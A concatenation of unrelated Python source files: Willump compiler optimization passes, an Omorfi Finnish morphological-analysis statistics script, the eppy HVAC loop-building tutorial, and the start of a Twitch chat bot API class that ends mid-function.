df_creation_node = WillumpPythonNode(python_ast=df_creation_ast.body[0], input_names=[],
output_names=[output_name], output_types=[], in_nodes=[])
pandas_post_processing_nodes.append(df_creation_node)
return pandas_input_processing_nodes, pandas_post_processing_nodes
def weld_pandas_series_marshalling_pass(weld_block_input_set: Set[str], weld_block_output_set: Set[str],
typing_map: Mapping[str, WeldType]) \
-> Tuple[List[WillumpPythonNode], List[WillumpPythonNode]]:
"""
Processing pass creating Python code to marshall Pandas Series into a representation (numpy array) Weld can
understand.
# TODO: Also convert back to Pandas series.
"""
pandas_input_processing_nodes: List[WillumpPythonNode] = []
pandas_post_processing_nodes: List[WillumpPythonNode] = []
for input_name in weld_block_input_set:
input_type = typing_map[input_name]
if isinstance(input_type, WeldSeriesPandas):
# Strip line numbers from variable name.
stripped_input_name = strip_linenos_from_var(input_name)
series_glue_python = "%s = %s.values" % (stripped_input_name, stripped_input_name)
series_glue_ast: ast.Module = \
ast.parse(series_glue_python, "exec")
series_input_node = WillumpPythonNode(python_ast=series_glue_ast.body[0], input_names=[],
output_names=[input_name], output_types=[], in_nodes=[])
pandas_input_processing_nodes.append(series_input_node)
return pandas_input_processing_nodes, pandas_post_processing_nodes
def weld_csr_marshalling_pass(weld_block_input_set: Set[str], weld_block_output_set: Set[str],
typing_map: Mapping[str, WeldType]) \
-> Tuple[List[WillumpPythonNode], List[WillumpPythonNode]]:
"""
Processing pass creating Python code to marshall CSR-format sparse matrices from Weld into Python.
"""
csr_input_processing_nodes: List[WillumpPythonNode] = []
csr_post_processing_nodes: List[WillumpPythonNode] = []
for input_name in weld_block_input_set:
input_type = typing_map[input_name]
stripped_input_name = strip_linenos_from_var(input_name)
store_weld_form_name = "weld_csr_" + stripped_input_name
temp_name = "temp_" + stripped_input_name
if isinstance(input_type, WeldCSR):
csr_marshall = """{0}, {2} = csr_marshall({0}), {0}\n""".format(
stripped_input_name, store_weld_form_name, temp_name)
csr_creation_ast: ast.Module = \
ast.parse(csr_marshall, "exec")
csr_creation_node = WillumpPythonNode(python_ast=csr_creation_ast.body[0], input_names=[],
output_names=[], output_types=[], in_nodes=[])
csr_input_processing_nodes.append(csr_creation_node)
car_unmarshaller = """{0} = {1}\n""".format(stripped_input_name, temp_name)
csr_unmarshaller_ast: ast.Module = \
ast.parse(car_unmarshaller, "exec")
csr_unmarshaller_node = WillumpPythonNode(python_ast=csr_unmarshaller_ast.body[0], input_names=[],
output_names=[], output_types=[], in_nodes=[])
csr_post_processing_nodes.append(csr_unmarshaller_node)
for output_name in weld_block_output_set:
output_type = typing_map[output_name]
stripped_output_name = strip_linenos_from_var(output_name)
store_weld_form_name = "weld_csr_" + stripped_output_name
if isinstance(output_type, WeldCSR):
csr_marshall = """{0}, {1} = scipy.sparse.csr_matrix(({0}[2], ({0}[0], {0}[1])), shape=({0}[3], {0}[4])), {0}\n""".format(
stripped_output_name, store_weld_form_name)
csr_creation_ast: ast.Module = \
ast.parse(csr_marshall, "exec")
csr_creation_node = WillumpPythonNode(python_ast=csr_creation_ast.body[0], input_names=[],
output_names=[output_name], output_types=[], in_nodes=[])
csr_post_processing_nodes.append(csr_creation_node)
return csr_input_processing_nodes, csr_post_processing_nodes
def multithreading_weld_blocks_pass(weld_block_node_list: List[WillumpGraphNode],
weld_block_input_set: Set[str],
weld_block_output_set: Set[str],
num_threads: int) \
-> List[typing.Union[Tuple[List[WillumpGraphNode], Set[str], Set[str]],
Tuple[Set[str], List[Tuple[List[WillumpGraphNode], Set[str]]]]]]:
"""
Identify opportunities for multithreading in the node list and parallelize them. Return a list of sequential
Weld blocks (Tuples of node lists, inputs, and outputs) or parallel node blocks (inputs, then a list of tuples
of node lists and outputs).
TODO: Only parallelizes node blocks ending in a StackSparseNode.
TODO: Assumes subgraphs rooted in inputs to a StackSparseNode and in weld_block_node_list are disjoint.
"""
combine_node = weld_block_node_list[-1]
if not isinstance(combine_node, StackSparseNode):
return [(weld_block_node_list, weld_block_input_set, weld_block_output_set)]
input_nodes = combine_node.get_in_nodes()
thread_list: List[Tuple[List[WillumpGraphNode], Set[str]]] = []
for model_input_node in input_nodes:
# The graph below model_input_node, topologically sorted.
sorted_nodes: List[WillumpGraphNode] = topological_sort_graph(WillumpGraph(model_input_node))
# Only the nodes from that graph which are in our block.
sorted_nodes = list(filter(lambda x: x in weld_block_node_list, sorted_nodes))
output_set: Set[str] = set()
for node in sorted_nodes:
output_name = node.get_output_name()
if output_name in weld_block_output_set or node is model_input_node:
output_set.add(output_name)
thread_list.append((sorted_nodes, output_set))
# Coalesce if more jobs than threads.
if len(thread_list) > num_threads:
thread_list_length = len(thread_list) # To avoid Python weirdness.
thread_list_index = 0
while thread_list_length > num_threads:
assert (thread_list_index < thread_list_length)
graph_nodes_one, outputs_one = thread_list[thread_list_index]
graph_nodes_two, outputs_two = thread_list[(thread_list_index + 1) % thread_list_length]
graph_nodes_comb = graph_nodes_one + graph_nodes_two
outputs_comb = outputs_one.union(outputs_two)
new_entry: List[Tuple[List[WillumpGraphNode], Set[str]]] = [(graph_nodes_comb, outputs_comb)]
if (thread_list_index + 1) % thread_list_length != 0:
thread_list = thread_list[0:thread_list_index] + new_entry + thread_list[thread_list_index + 2:]
else:
thread_list = new_entry + thread_list[1:-1]
thread_list_length -= 1
thread_list_index = (thread_list_index + 1) % thread_list_length
parallel_entry: Tuple[Set[str], List[Tuple[List[WillumpGraphNode], Set[str]]]] = (weld_block_input_set, thread_list)
combiner_input_names = set(combine_node.get_in_names())
combiner_output_name = {combine_node.get_output_name()}
sequential_entry: Tuple[List[WillumpGraphNode], Set[str], Set[str]] = ([combine_node],
combiner_input_names, combiner_output_name)
return [parallel_entry, sequential_entry]
def async_python_functions_parallel_pass(sorted_nodes: List[WillumpGraphNode]) \
-> List[WillumpGraphNode]:
"""
Run all asynchronous Python nodes in separate threads.
"""
def find_pyblock_after_n(n: int) -> Optional[Tuple[int, int]]:
start_index = None
end_index = None
for i, statement in enumerate(sorted_nodes):
if i > n and isinstance(statement, WillumpPythonNode) \
and not isinstance(statement, CascadePointEarlyExitNode):
start_index = i
break
if start_index is None:
return None
for i, statement in enumerate(sorted_nodes):
if i > start_index and ((not isinstance(statement, WillumpPythonNode)
and not isinstance(statement, WillumpInputNode))\
or isinstance(statement, CascadePointEarlyExitNode)):
end_index = i
break
if end_index is None:
end_index = len(sorted_nodes)
return start_index, end_index
pyblock_start_end = find_pyblock_after_n(-1)
while pyblock_start_end is not None:
pyblock_start, pyblock_end = pyblock_start_end
assert(pyblock_start < pyblock_end)
pyblock: List[WillumpPythonNode] = sorted_nodes[pyblock_start:pyblock_end]
async_nodes = []
for node in pyblock:
if isinstance(node, WillumpPythonNode) and node.is_async_node:
async_nodes.append(node)
for async_node in async_nodes:
assert (len(async_node.get_output_names()) == 1)
async_node_output_name: str = async_node.get_output_names()[0]
async_node_index = pyblock.index(async_node)
input_names: List[str] = async_node.get_in_names()
first_legal_index: int = async_node_index
for j in range(async_node_index - 1, 0 - 1, -1):
if any(output_name in input_names for output_name in pyblock[j].get_output_names()):
break
else:
first_legal_index = j
pyblock.remove(async_node)
async_node_ast: ast.Assign = async_node.get_python()
assert (isinstance(async_node_ast.value, ast.Call))
assert (isinstance(async_node_ast.value.func, ast.Name))
# output = executor.submit(original func names, original func args...)
new_call = ast.Call()
new_call.keywords = []
new_call.func = ast.Attribute()
new_call.func.attr = "submit"
new_call.func.ctx = ast.Load()
new_call.func.value = ast.Name()
new_call.func.value.id = WILLUMP_THREAD_POOL_EXECUTOR
new_call.func.value.ctx = ast.Load()
new_args = async_node_ast.value.args
new_first_arg = ast.Name()
new_first_arg.id = async_node_ast.value.func.id
new_first_arg.ctx = ast.Load()
new_args.insert(0, new_first_arg)
new_call.args = new_args
async_node_ast.value = new_call
executor_async_node = WillumpPythonNode(python_ast=async_node_ast, input_names=async_node.get_in_names(),
output_names=async_node.get_output_names(),
output_types=async_node.get_output_types(),
in_nodes=async_node.get_in_nodes())
pyblock.insert(first_legal_index, executor_async_node)
last_legal_index = first_legal_index + 1
for j in range(first_legal_index + 1, len(pyblock)):
curr_node = pyblock[j]
node_inputs = curr_node.get_in_names()
if async_node_output_name in node_inputs:
break
else:
last_legal_index = j
result_python = "%s = %s.result()" % (strip_linenos_from_var(async_node_output_name),
strip_linenos_from_var(async_node_output_name))
result_ast: ast.Module = \
ast.parse(result_python, "exec")
pandas_input_node = WillumpPythonNode(python_ast=result_ast.body[0],
input_names=[async_node_output_name],
output_names=async_node.get_output_names(),
output_types=async_node.get_output_types(),
in_nodes=[executor_async_node])
pyblock.insert(last_legal_index, pandas_input_node)
sorted_nodes = sorted_nodes[:pyblock_start] + pyblock + sorted_nodes[pyblock_end:]
pyblock_start_end = find_pyblock_after_n(pyblock_end)
return sorted_nodes
def cache_python_block_pass(sorted_nodes: List[WillumpGraphNode], willump_cache_dict: dict,
max_cache_size: Optional[int]) -> List[WillumpGraphNode]:
"""
Detect cacheable functions and cache them by replacing calls to them with calls to the caching function.
"""
node_num = 0
for i, entry in enumerate(sorted_nodes):
if isinstance(entry, WillumpPythonNode) and entry.is_cached_node:
entry_ast: ast.Assign = entry.get_python()
assert (isinstance(entry_ast, ast.Assign))
value = entry_ast.value
assert (isinstance(value, ast.Call))
assert (isinstance(value.func, ast.Name))
assert (len(entry_ast.targets) == 1)
if all(isinstance(arg_entry, ast.Name) for arg_entry in value.args) \
and isinstance(entry_ast.targets[0], ast.Name):
target_name = entry_ast.targets[0].id
func_name = value.func.id
arg_string = ""
for arg in value.args:
arg_string += "%s," % arg.id
cache_python = \
"""%s = willump_cache(%s, (%s), %s, %d)""" % \
(target_name, func_name, arg_string, WILLUMP_CACHE_NAME, node_num)
cache_ast: ast.Module = ast.parse(cache_python, "exec")
cache_node = WillumpPythonNode(python_ast=cache_ast.body[0], input_names=entry.get_in_names(),
output_names=entry.get_output_names(),
output_types=entry.get_output_types(),
in_nodes=entry.get_in_nodes(),
is_async_node=entry.is_async_node)
sorted_nodes[i] = cache_node
node_num += 1
# Initialize all caches.
if max_cache_size is None:
max_cache_size = math.inf
num_cached_nodes = node_num
cache_dict_caches = {}
cache_dict_max_lens = {}
for i in range(num_cached_nodes):
cache_dict_caches[i] = OrderedDict()
cache_dict_max_lens[i] = max_cache_size / num_cached_nodes
willump_cache_dict[WILLUMP_CACHE_NAME] = cache_dict_caches
willump_cache_dict[WILLUMP_CACHE_MAX_LEN_NAME] = cache_dict_max_lens
willump_cache_dict[WILLUMP_CACHE_ITER_NUMBER] = 0
return sorted_nodes
|
<filename>omorfi/omorfi_parse.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import codecs
import locale
import re
import sys
import gzip
from collections import defaultdict
excluded_fields = ["BLACKLIST", "WORD_ID"]
MAX_NUM_ANALYSES_PER_WORD = 15
TAG_SEPARATOR = ","
def _read_analyses_file(analysisFname, analyses, shortenLongNumberAnalysis=True, encoding="utf8"):
if analysisFname.endswith(".gz"):
analysisFile = gzip.open(analysisFname, "rt", encoding=encoding)
else:
analysisFile = codecs.open(analysisFname, encoding=encoding)
for line in analysisFile:
line = line.strip()
if not len(line): continue
if line.startswith("Strings\tFound"): break
tokens = line.split("\t")
if len(tokens) != 2:
raise Exception("Erroneous Omorfi analysis: %s" % line)
word = tokens[0].lower()
if word not in analyses:
analyses[word] = list()
analysis_tokens = re.findall("\[(.*?)\]", tokens[1])
if analysis_tokens:
analysis_tokens = list(filter(lambda x: x.split("=")[0] not in excluded_fields, analysis_tokens))
# In this case, keep only the analysis tags after the last BOUNDARY=COMPOUND tag
if shortenLongNumberAnalysis and "UPOS=NUM" in analysis_tokens[0]:
compound_sep_poss = [i for i, x in enumerate(analysis_tokens) if x == "BOUNDARY=COMPOUND"]
if len(compound_sep_poss):
analysis_tokens = analysis_tokens[compound_sep_poss[-1]+1:]
word_analysis = TAG_SEPARATOR.join(analysis_tokens)
if len(word_analysis) and word_analysis not in analyses[word]:
analyses[word].append(word_analysis)
return analyses
def _merge_large_coverage_analyses(analyses, large_coverage_analyses):
extra_words = 0
extra_analyses = 0
for word, word_analyses in analyses.items():
large_coverage_word_analyses = large_coverage_analyses[word]
is_number = len([x for x in large_coverage_word_analyses if "UPOS=NUM" in x]) > 0
if len(large_coverage_word_analyses) <= MAX_NUM_ANALYSES_PER_WORD:
if not len(word_analyses) and len(large_coverage_word_analyses):
extra_words += 1
analyses[word] = large_coverage_word_analyses
elif not is_number and len(large_coverage_word_analyses) > len(word_analyses):
extra_analyses += 1
analyses[word] = large_coverage_word_analyses
return extra_words, extra_analyses
def read_analyses(analysisFname, largeCoverageAnalysisFname, shortenLongNumberAnalysis=True, verbose=True):
analyses = dict()
if verbose:
print("Reading default vocabulary Omorfi analyses..", file=sys.stderr)
_read_analyses_file(analysisFname, analyses, shortenLongNumberAnalysis)
large_coverage_analyses = dict()
if verbose:
print("Reading extended vocabulary Omorfi analyses..", file=sys.stderr)
_read_analyses_file(largeCoverageAnalysisFname, large_coverage_analyses, shortenLongNumberAnalysis)
if len(analyses) != len(large_coverage_analyses):
raise Exception("number of analyses don't match, (%i and %i)" % (len(analyses), len(large_coverage_analyses)))
if verbose:
print("Merging analysis outputs..", file=sys.stderr)
extra_words, extra_analyses = _merge_large_coverage_analyses(analyses, large_coverage_analyses)
if verbose:
print("Number of new words with analyses in the extended vocabulary: %i" % extra_words, file=sys.stderr)
print("Number of words with more analyses in the extended vocabulary: %i" % extra_analyses, file=sys.stderr)
print("")
return analyses
def get_num_analyses_per_word(analyses):
analysis_counts = defaultdict(int)
word_analysis_counts = [len(x) for x in analyses.values() if x]
for count in word_analysis_counts:
analysis_counts[count] += 1
return analysis_counts
def get_analysis_classes(analyses):
analysis_types = defaultdict(int)
for word_analyses in analyses.values():
if word_analyses:
for word_analysis in word_analyses:
analysis_types[word_analysis] += 1
return analysis_types
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Prints statistics about the Omorfi analyses")
parser.add_argument("ANALYSES", help="Output from the Omorfi analyzer without the -X switch.")
parser.add_argument("LARGE_COVERAGE_ANALYSES", help="Output from the Omorfi analyzer with the -X switch.")
args = parser.parse_args()
locale.setlocale(locale.LC_ALL, 'en_US.utf8')
analyses = read_analyses(args.ANALYSES, args.LARGE_COVERAGE_ANALYSES, True, True)
num_w_analyses = len([x for x in analyses.values() if len(x)])
case_info = dict()
for word, word_analyses in analyses.items():
case_info[word] = list(map(lambda x: "UPOS=PROPN" in x, list(word_analyses)))
num_uc = len([x for x in case_info.values() if x.count(True) > 0])
num_lc = len([x for x in case_info.values() if x.count(False) > 0])
num_both = len([x for x in case_info.values() if x.count(False) > 0 and x.count(True) > 0])
print("Number of words: %i" % len(analyses), file=sys.stderr)
print("Words with analysis: %i" % num_w_analyses, file=sys.stderr)
print("Words with uppercase analysis: %i" % num_uc, file=sys.stderr)
print("Words with lowercase analysis: %i" % num_lc, file=sys.stderr)
print("Words with both upper and lowercase analysis: %i" % num_both, file=sys.stderr)
print("", file=sys.stderr)
counts = get_num_analyses_per_word(analyses)
for analysis_count in sorted(counts):
print("Words with %i analyses: %i" % (analysis_count, counts[analysis_count]), file=sys.stderr)
print("", file=sys.stderr)
analysis_types = get_analysis_classes(analyses)
print("Distinct morphological classes: %i" % len(analysis_types), file=sys.stderr)
# for analysis_type, count in analysis_types.items():
# print("")
# print("%s\t%i" % (analysis_type, count))
|
<filename>docs/HVAC_Tutorial.py
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=1>
# HVAC Loops
# <headingcell level=2>
# Conceptual Introduction to HVAC Loops
# <markdowncell>
# Eppy builds threee kinds of loops for the energyplus idf file:
#
# 1. Plant Loops
# 2. Condensor Loops
# 3. Air Loops
#
# All loops have two halves:
#
# 1. Supply side
# 2. Demand Side
#
# The supply side provides the energy to the demand side that needs the energy. So the end-nodes on the supply side connect to the end-nodes on the demand side.
#
# The loop is made up of branches connected to each other. A single branch can lead to multiple branches through a **splitter** component. Multiple branches can lead to a single branch through a **mixer** component.
#
# Each branch is made up of components connected in series (in a line)
#
# Eppy starts off by building the shape or topology of the loop by connecting the branches in the right order. The braches themselves have a single component in them, that is just a place holder. Usually it is a pipe component. In an air loop it would be a duct component.
#
# The shape of the loop for the supply or demand side is quite simple.
#
# It can be described in the following manner for the supply side
#
# - The supply side starts single branch leads to a splitter
# - The splitter leads to multiple branches
# - these multiple branches come back and join in a mixer
# - the mixer leads to a single branch that becomes end of the suppply side
#
# For the demand side we have:
#
# - The demand side starts single branch leads to a splitter
# - The splitter leads to multiple branches
# - these multiple branches come back and join in a mixer
# - the mixer leads to a single branch that becomes end of the demand side
#
# The two ends of the supply side connect to the two ends of the demand side.
# <markdowncell>
# Diagramtically the the two sides of the loop will look like this::
# <rawcell>
# Supply Side:
# ------------
# -> branch1 ->
# start_branch --> branch2 --> end_branch
# -> branch3 ->
# Demand Side:
# ------------
#
# -> d_branch1 ->
# d_start_branch --> d_branch2 --> d_end_branch
# -> d_branch3 ->
#
# <markdowncell>
#
# In eppy you could embody this is a list
# <codecell>
supplyside = ["start_brandh", ["branch1", "branch2", "branch3"], "end_branch"]
demandside = ["d_start_brandh", ["d_branch1", "d_branch2", "d_branch3"], "d_end_branch"]
# <markdowncell>
# Eppy will build the build the shape/topology of the loop using the two lists above. Each branch will have a placeholder component, like a pipe or a duct::
# <rawcell>
#
# branch1 = --duct--
# <markdowncell>
# Now we will have to replace the placeholder with the real components that make up the loop. For instance, branch1 should really have a pre-heat coil leading to a supply fan leading to a cooling coil leading to a heating coil::
# <rawcell>
#
# new_branch = pre-heatcoil -> supplyfan -> coolingcoil -> heatingcoil
# <markdowncell>
# Eppy lets you build a new branch and you can replace branch1 with new_branch
#
# In this manner we can build up the entire loop with the right components, once the initial toplogy is right
# <headingcell level=2>
# Building a Plant loops
# <markdowncell>
# Eppy can build up the topology of a plant loop using single pipes in a branch. Once we do that the simple branch in the loop we have built can be replaced with a more complex branch.
#
# Let us try this out ans see how it works.
# <headingcell level=3>
# Building the topology of the loop
# <codecell>
# you would normaly install eppy by doing
# python setup.py install
# or
# pip install eppy
# or
# easy_install eppy
# if you have not done so, uncomment the following three lines
import sys
# pathnameto_eppy = 'c:/eppy'
pathnameto_eppy = "../"
sys.path.append(pathnameto_eppy)
# <codecell>
from eppy.modeleditor import IDF
from eppy import hvacbuilder
from io import StringIO
iddfile = "../eppy/resources/iddfiles/Energy+V7_0_0_036.idd"
IDF.setiddname(iddfile)
# <codecell>
# make the topology of the loop
idf = IDF(StringIO("")) # makes an empty idf file in memory with no file name
loopname = "p_loop"
sloop = ["sb0", ["sb1", "sb2", "sb3"], "sb4"] # supply side of the loop
dloop = ["db0", ["db1", "db2", "db3"], "db4"] # demand side of the loop
hvacbuilder.makeplantloop(idf, loopname, sloop, dloop)
idf.saveas("hhh1.idf")
# <markdowncell>
# We have made plant loop and saved it as hhh1.idf.
# Now let us look at what the loop looks like.
# <headingcell level=3>
# Diagram of the loop
# <markdowncell>
# Let us use the script "eppy/useful_scripts/loopdiagrams.py" to draw this diagram
# <markdowncell>
# See [Generating a Loop Diagram](useful_scripts.html#loopdiagram-py) page for details on how to do this
# <markdowncell>
# Below is the diagram for this simple loop
#
# *Note: the supply and demnd sides are not connected in the diagram, but shown seperately for clarity*
# <codecell>
from eppy import ex_inits # no need to know this code, it just shows the image below
for_images = ex_inits
for_images.display_png(for_images.plantloop1) # display the image below
# <headingcell level=3>
# Modifying the topology of the loop
# <markdowncell>
# Let us make a new branch and replace the exisiting branch
#
# The existing branch name is "sb0" and it contains a single pipe component sb0_pipe.
#
# Let us replace it with a branch that has a chiller that is connected to a pipe which is turn connected to another pipe. So the connections in the new branch would look like "chiller-> pipe1->pipe2"
# <codecell>
# make a new branch chiller->pipe1-> pipe2
# make a new pipe component
pipe1 = idf.newidfobject("PIPE:ADIABATIC", "np1")
# make a new chiller
chiller = idf.newidfobject("Chiller:Electric".upper(), "Central_Chiller")
# make another pipe component
pipe2 = idf.newidfobject("PIPE:ADIABATIC", "np2")
# get the loop we are trying to modify
loop = idf.getobject("PLANTLOOP", "p_loop") # args are (key, name)
# get the branch we are trying to modify
branch = idf.getobject("BRANCH", "sb0") # args are (key, name)
listofcomponents = [
chiller,
pipe1,
pipe2,
] # the new components are connected in this order
newbr = hvacbuilder.replacebranch(idf, loop, branch, listofcomponents, fluid="Water")
# in "loop"
# this replaces the components in "branch" with the components in "listofcomponents"
idf.saveas("hhh_new.idf")
# <markdowncell>
# We have saved this as file "hhh_new.idf".
# Let us draw the diagram of this file. (run this from eppy/eppy folder)
# <rawcell>
# python ex_loopdiagram.py hhh_new.idf
# <codecell>
from eppy import ex_inits # no need to know this code, it just shows the image below
for_images = ex_inits
for_images.display_png(for_images.plantloop2) # display the image below
# <markdowncell>
# This diagram shows the new components in the branch
# <headingcell level=3>
# Traversing the loop
# <markdowncell>
# It would be nice to move through the loop using functions "nextnode()" and "prevnode()"
#
# Eppy indeed has such functions
#
# Let us try to traverse the loop above.
# <codecell>
# to traverse the loop we are going to call some functions ex_loopdiagrams.py,
# the program that draws the loop diagrams.
from eppy import ex_loopdiagram
fname = "hhh_new.idf"
iddfile = "../eppy/resources/iddfiles/Energy+V8_0_0.idd"
edges = ex_loopdiagram.getedges(fname, iddfile)
# edges are the lines that draw the nodes in the loop.
# The term comes from graph theory in mathematics
# <markdowncell>
# The above code gets us the edges of the loop diagram. Once we have the edges, we can traverse through the diagram. Let us start with the "Central_Chiller" and work our way down.
# <codecell>
from eppy import walk_hvac
firstnode = "Central_Chiller"
nextnodes = walk_hvac.nextnode(edges, firstnode)
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <markdowncell>
# This leads us to three components -> ['sb1_pipe', 'sb2_pipe', 'sb3_pipe']. Let us follow one of them
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <markdowncell>
# We have reached the end of this branch. There are no more components.
#
# We can follow this in reverse using the function prevnode()
# <codecell>
lastnode = "sb4_pipe"
prevnodes = walk_hvac.prevnode(edges, lastnode)
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <markdowncell>
# All the way to where the loop ends
# <headingcell level=2>
# Building a Condensor loop
# <markdowncell>
# We build the condensor loop the same way we built the plant loop. Pipes are put as place holders for the components. Let us build a new idf file with just a condensor loop in it.
# <codecell>
condensorloop_idf = IDF(StringIO(""))
loopname = "c_loop"
sloop = ["sb0", ["sb1", "sb2", "sb3"], "sb4"] # supply side
dloop = ["db0", ["db1", "db2", "db3"], "db4"] # demand side
theloop = hvacbuilder.makecondenserloop(condensorloop_idf, loopname, sloop, dloop)
condensorloop_idf.saveas("c_loop.idf")
# <markdowncell>
# Again, just as we did in the plant loop, we can change the components of the loop, by replacing the branchs and traverse the loop using the functions nextnode() and prevnode()
# <headingcell level=2>
# Building an Air Loop
# <markdowncell>
# Building an air loop is similar to the plant and condensor loop. The difference is that instead of pipes , we have ducts as placeholder components. The other difference is that we have zones on the demand side.
# <codecell>
airloop_idf = IDF(StringIO(""))
loopname = "a_loop"
sloop = ["sb0", ["sb1", "sb2", "sb3"], "sb4"] # supply side of the loop
dloop = ["zone1", "zone2", "zone3"] # zones on the demand side
hvacbuilder.makeairloop(airloop_idf, loopname, sloop, dloop)
airloop_idf.saveas("a_loop.idf")
# <markdowncell>
# Again, just as we did in the plant and condensor loop, we can change the components of the loop, by replacing the branchs and traverse the loop using the functions nextnode() and prevnode()
|
import ast
import time
from typing import Union, Dict
import requests
import pickle
import os
import asyncio
from asyncirc.protocol import IrcProtocol
from asyncirc.server import Server
from irclib.parser import Message
from database import User
import database
import contexts
import commands
from termcolor import colored
import contextlib
from more_tools import CachedProperty, BidirectionalMap
from customizable_stuff import load_command_names, load_message_templates
class API:
def __init__(self, overlord=None, loop=None, prefix="!"):
self.overlord = overlord
self.twitch_client_id = 'q4nn0g7b07xfo6g1lwhp911spgutps'
self._cache = {}
self.streamlabs_key = ''
self.twitch_key = ''
self.twitch_key_requires_refreshing = False
self.twitch_key_just_refreshed = False
self.stream_elements_key_requires_refreshing = False
self.stream_elements_key_just_refreshed = False
self.stream_elements_key = ''
self.load_keys()
self._name = None
self.users = []
self.conn = None
self.prefix = prefix
self.commands: Dict[str, Union[commands.Command, commands.Group]] = {}
self.loop = loop
self.started = False
self.console_buffer = ['placeholder']
# self.command_names = {('acquire', None): 'buy', ('my', None): 'my', ('income', 'my'): 'income'}
self.command_names = {}
self.load_command_names()
# self.command_names = {
# ('stocks', None): 'stocks',
# ('stonks', None): 'stocks',
# }
self.console_buffer_done = []
self.not_sent_buffer = []
self.streamlabs_local_send_buffer = ''
self.streamlabs_local_receive_buffer = ''
self.streamlabs_local_buffer_lock = asyncio.Lock()
self.streamlabs_local_send_buffer_event = asyncio.Event()
self.streamlabs_local_receive_buffer_event = asyncio.Event()
def load_keys(self):
session = database.Session()
self.load_key(key_name='streamlabs_key', session=session)
self.load_key(key_name='twitch_key', session=session)
self.load_key(key_name='stream_elements_key', session=session)
self.validate_twitch_token()
def load_key(self, key_name, session=None):
if session is None:
session = database.Session()
key_db = session.query(database.Settings).get(key_name)
if key_db:
setattr(self, key_name, key_db.value)
else:
if os.path.exists(f'lib/{key_name}'):
with open(f'lib/{key_name}', 'rb') as f:
key = pickle.load(f)
session.add(database.Settings(key=f'{key_name}', value=key))
session.commit()
os.remove(f'lib/{key_name}')
def get_user(self):
""":returns: Information regarding the Streamer through Twitch API. Currently used just for fetching the name."""
if self.tokens_ready:
url = "https://api.twitch.tv/helix/users"
headers = {"Authorization": f'Bearer {self.twitch_key}', 'Client-ID': f'{self.twitch_client_id}'}
res = requests.get(url, headers=headers)
if res.status_code == 200:
return res.json()
else:
raise ValueError("Tried fetching user info, but failed. Probably an invalid Twitch Token. Tell Razbi.")
return ValueError("Tried fetching user info, but tokens are not ready for use. Tell Razbi. "
"If this actually happened, it's really really bad.")
async def create_context(self, username, session):
user = await self.generate_user(username, session=session)
return contexts.UserContext(user=user, api=self, session=session)
async def handler(self, conn, message: Union[Message, str]):
text: str = message.parameters[1].lower()
if not text.startswith(self.prefix):
return
username = message.prefix.user
text = text[len(self.prefix):]
old_command_name, *args = text.split()
command_name = self.command_names.get((old_command_name, None), old_command_name)
command_name, _, group_name = command_name.partition(" ")
if group_name:
args.insert(0, group_name)
if command_name in self.commands:
with contextlib.closing(database.Session()) as session:
ctx = await self.create_context(username, session)
try:
# noinspection PyTypeChecker
await self.commands[command_name](ctx, *args)
except commands.BadArgumentCount as e:
self.send_chat_message(f'@{ctx.user.name} Usage: {self.prefix}{e.usage(name=old_command_name)}')
except commands.CommandError as e:
self.send_chat_message(e.msg)
@staticmethod
async def generate_user(name, session=None):
local_session = False
if session is None:
local_session = True
session = database.Session()
user = session.query(User).filter_by(name=name).first()
if not user:
user = User(name=name)
session.add(user)
session.commit()
if local_session:
session.close()
return user
async def start_read_chat(self):
while not self.started:
await asyncio.sleep(.5)
server = [Server("irc.chat.twitch.tv", 6667, password=f'<PASSWORD>:{self.twitch_key}')]
self.conn = IrcProtocol(server, nick=self.name, loop=self.loop)
self.conn.register('PRIVMSG', self.handler)
await self.conn.connect()
self.conn.send(f"JOIN #{self.name}")
print(f"{colored('Ready to read chat commands', 'green')}. "
f"To see all basic commands type {colored('!stocks', 'magenta')} in the twitch chat")
self.clear_unsent_buffer()
if self.currency_system == 'streamlabs_local':
await self.ping_streamlabs_local()
# self.conn.send(f"PRIVMSG #{self.name} :I'm testing if this damn thing works")
# self.conn.send(f"PRIVMSG #{self.name} :hello")
await asyncio.sleep(24 * 60 * 60 * 365 * 100)
def send_chat_message(self, message: str):
if self.conn and self.conn.connected:
self.conn.send(f"PRIVMSG #{self.name} :{message}")
if message != '':
print(f"{colored('Message sent:', 'cyan')} {colored(message, 'yellow')}")
self.console_buffer.append(str(message))
else:
self.not_sent_buffer.append(message)
def clear_unsent_buffer(self):
if self.not_sent_buffer:
temp_buffer = self.not_sent_buffer
self.not_sent_buffer = []
for element in temp_buffer:
self.send_chat_message(element)
async def add_points(self, user: str, amount: int):
if self.tokens_ready:
if self.currency_system == 'streamlabs':
url = "https://streamlabs.com/api/v1.0/points/subtract"
querystring = {"access_token": self.streamlabs_key,
"username": user,
"channel": self.name,
"points": -amount}
return requests.post(url, data=querystring).json()["points"]
elif self.currency_system == 'stream_elements':
url = f'https://api.streamelements.com/kappa/v2/points/{self.stream_elements_id}/{user}/{amount}'
headers = {'Authorization': f'OAuth {self.stream_elements_key}'}
res = requests.put(url, headers=headers)
# print(res.json())
if res.status_code == 200:
return res.json()["newAmount"]
raise ValueError(f"Error encountered while adding points with stream_elements system. HTTP Code {res.status_code}. "
"Please tell Razbi about it.")
# return requests.put(url, headers=headers).json()["newAmount"]
elif self.currency_system == 'streamlabs_local':
